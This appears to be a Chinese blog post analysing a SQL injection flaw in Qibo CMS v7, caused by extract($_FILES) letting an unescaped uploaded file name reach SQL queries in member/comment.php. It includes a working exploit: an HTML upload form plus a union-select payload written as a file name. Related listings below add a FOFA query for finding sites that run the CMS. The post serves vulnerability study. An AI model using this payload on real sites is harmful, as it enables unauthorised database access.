`

齐博CMS的sql注入漏洞学习

阅读更多

       今天看到了asrc上面对某个cms的漏洞分析的文章(http://security.alibaba.com/blog/blog.htm?spm=0.0.0.0.96tpib&id=13 ),感觉阿里大牛在写漏洞分析的时候还是有点谨慎,利用方式什么就更不能说了。

       百度搜了一下这个CMS,使用量还是不小的。对php不太懂,简单学习了一下,并且总结了利用方式。

       漏洞的原因就是 inc/common.inc.php 中的这一段代码:

 

if(!ini_get('register_globals')){
	@extract($_FILES,EXTR_SKIP);
}

       这段代码的含义就是把 php接收到的$_Files 请求的数组转换成一些变量。而我们知道,这些变量是不会经过魔术引号的转义的。

       再看 member/comment.php 这个文件,如下代码:

 

if($job=='del'){
      foreach( $cidDB AS $key=>$value){
		$rs=$db->get_one("SELECT aid FROM {$pre}comment WHERE cid='$value'");
		$erp=get_id_table($rs[aid]);
		$rsdb=$db->get_one("SELECT C.cid,C.uid AS commentuid,C.aid,A.uid,A.fid FROM {$pre}comment C LEFT JOIN {$pre}article$erp A ON C.aid=A.aid WHERE C.cid='$value'");
		if($rsdb[uid]==$lfjuid||$rsdb[commentuid]==$lfjuid||$web_admin||in_array($rsdb[fid],$fiddb)){
			$db->query("DELETE FROM {$pre}comment WHERE cid='$rsdb[cid]'");
		}
		$db->query("UPDATE {$pre}article$erp SET comments=comments-1 WHERE aid='$rsdb[aid]'");
	}
	refreshto("$FROMURL","删除成功",0);
}

       其中 $cidDB 这个变量本应该是从URL里面通过get方式获取的留言的id ,然后拼到sql语句里面执行sql的。

但是因为 comment.php引用了common.inc.php,并且$cidDB并没有初始化,所以这边我们可以用 $_Files里面的变量去直接给 $cidDB 赋值,并且没有转义。酷

         poc:

         其实算不上poc,就是一个简单的利用方式。

         写一个简单的html页面:

         action里面写网站相关地址

 

<form method="post" action="http://127.0.0.1/v7/member/comment.php?job=del" enctype="multipart/form-data">
<input type="file" name="cidDB" id="cidDB">
<input type="submit" name="submit">
</form>

         然后我们重命名一个文件,名为:1' union select version() and '1'='1

         然后提交上传,就可以看到返回结果了:



 

         

 

      这边有个比较麻烦的问题是: 由于value值保存在了两个sql语句里面,这两个语句的列不一样,所以这边用union会报错,只能盲注了。或者寻找一下其他地方的未初始化的变量也可。

   

     

 

         

 

 

 

  • 大小: 55.3 KB
  • 大小: 26.1 KB
分享到:
评论

相关推荐

    qibov7sql注入漏洞通杀

    qibov7sql注入漏洞通杀

    齐博CMS V7任意文件下载漏洞

    # 齐博CMS V7任意文件下载漏洞 ## 漏洞影响 ``` 齐博cms V7 ``` ## FOFA ``` app="齐博cms" ``` ## Poc 综合验证和利用脚本见 Qibo_v7.py

    齐博cms开发文档

    通过深入学习和实践齐博CMS的开发文档,开发者可以充分利用这个系统构建高效、可扩展且易于维护的网站。对于初次接触CMS开发的人员,这些文档无疑是宝贵的资源。在实际操作中,遇到不明确的地方,查阅官方文档往往能...

    齐博CMS地方门户标签大全开发手册

    齐博CMS地方门户标签大全开发手册,二次开发教程,二次开发使用手册

    齐博cms最新数据,样式标签

    齐博CMS(Qibo CMS)是一款广泛使用的开源内容管理系统,尤其在中国国内有着较高的知名度。它提供了丰富的功能,便于用户构建和管理网站。本压缩包文件包含的“样式标签”是齐博CMS系统中的一个重要组成部分,主要...

    齐博CMS开源PHP建站系统齐博CMS

    齐博CMS提供了一个便捷的后台管理界面,使得非技术背景的用户也能轻松编辑和管理网站内容。 3. **模块化设计** 齐博CMS包含了多个模块,如文章、图片、下载、商场、内置专题、订单和考试等。这些模块各自独立,...

    齐博CMS(原PHP168整站)系统正式版v7.0big5

    齐博CMS系统,原PHP168整站系统是国内开源CMS系统中较全面的产品,提供了包括文章、图片、下载、商场、内置专题、订单、考试... 齐博CMS系统 7.0 BIG5 升级功能大致如下: 增加QQ一键快速登录功能 增加手机WAP访问功能

    齐博CMS V7 文章发布模块

    齐博CMS V7 文章发布模块

    基于PHP的齐博CMS(原PHP168整站)正式免费版utf8源码.zip

    7. **安全防护**:系统内建了一些安全机制,例如防止SQL注入、XSS攻击,同时建议用户定期更新系统以修补可能的安全漏洞。 8. **移动适配**:随着移动互联网的发展,齐博CMS也考虑到了响应式设计,使网站能够适应...

    基于PHP的齐博整站CMS系统 清爽模板.zip

    7. **安全防护**:考虑到网络安全的重要性,齐博CMS可能内置了一些安全措施,如防止SQL注入、XSS攻击等,保护网站免受恶意攻击。 8. **移动端适配**:随着移动设备的普及,响应式设计成为必备,齐博CMS的清爽模板很...

    齐博CMS(原PHP168整站) V7.0 SP.rar

    齐博CMS整站系统是一个万能的系统,可以很灵活的二次开发,满足各种方案的需求,诸如企业站、政府站、媒体站等等 齐博CMS之V7特色如下: 非常简单易用的标签 任何不懂HMTL的人,通过标签都可以轻易的调用网站内容的数据...

    齐博CMS系统 7.0 UTF8.rar

    齐博CMS系统,原PHP168整站系统是国内开源CMS系统中较全面的产品,提供了包括文章、图片、下载、商场、内置专题、订单、考试等多种模块,适合二次开发,此外用户可以在后台对页面进行可视化标签调用。模板制作较简单...

    齐博CMS(原PHP168)模板制作助手--V7版.rar

    齐博CMS致力于提供安全的网站环境,V7版可能包含更完善的防护机制,如防止SQL注入、XSS攻击等,保护用户数据安全。 8. **社区支持**: 齐博CMS拥有活跃的开发者社区,用户可以在其中获取帮助、分享经验、下载插件...

    齐博cms模板

    齐博CMS,全称为“Qibo CMS”,是一款广泛使用的开源内容管理系统,专为构建企业网站、资讯门户等网络平台而设计。它提供了丰富的功能模块,包括文章管理、分类管理、评论系统、会员系统等,旨在帮助用户快速搭建并...

    齐博CMS(PHP168) v7.0 正式版 GBK

    齐博CMS系统,原PHP168整站系统是国内开源CMS系统中较全面的产品,提供了包括文章、图片、下载、商场、内置专题、订单、考试等多种模块,适合二次开发,此外用户可以在后台对页面进行可视化标签调用。模板制作较简单...

    基于PHP的齐博CMS(原PHP168整站) 正式免费版 utf8.zip

    6. **安全防护**:通过权限控制、防SQL注入、XSS攻击防护等手段,保障网站的安全运行。 7. **社交网络集成**:支持与社交媒体平台的整合,如分享到微博、微信等,增加网站的互动性。 8. **插件扩展**:开发者可以...

    基于PHP的齐博CMS(原PHP168整站)系统正式版源码.zip

    安全性是任何CMS系统的重要考虑因素,齐博CMS提供了诸如防止SQL注入、XSS攻击等的安全措施。同时,系统支持定期备份和恢复,确保数据的安全。 在扩展性方面,齐博CMS拥有丰富的插件和模块,比如SEO优化工具、支付...

    齐博CMS之v7正式版

    v7版本可能对系统的安全防护进行了强化,包括防止SQL注入、XSS攻击等,保障用户的网站数据安全。 5. **搜索引擎优化(SEO)**:为了提高网站的搜索引擎排名,v7可能提供了更完善的SEO设置,如自定义元标签、友好的...

Global site tag (gtag.js) - Google Analytics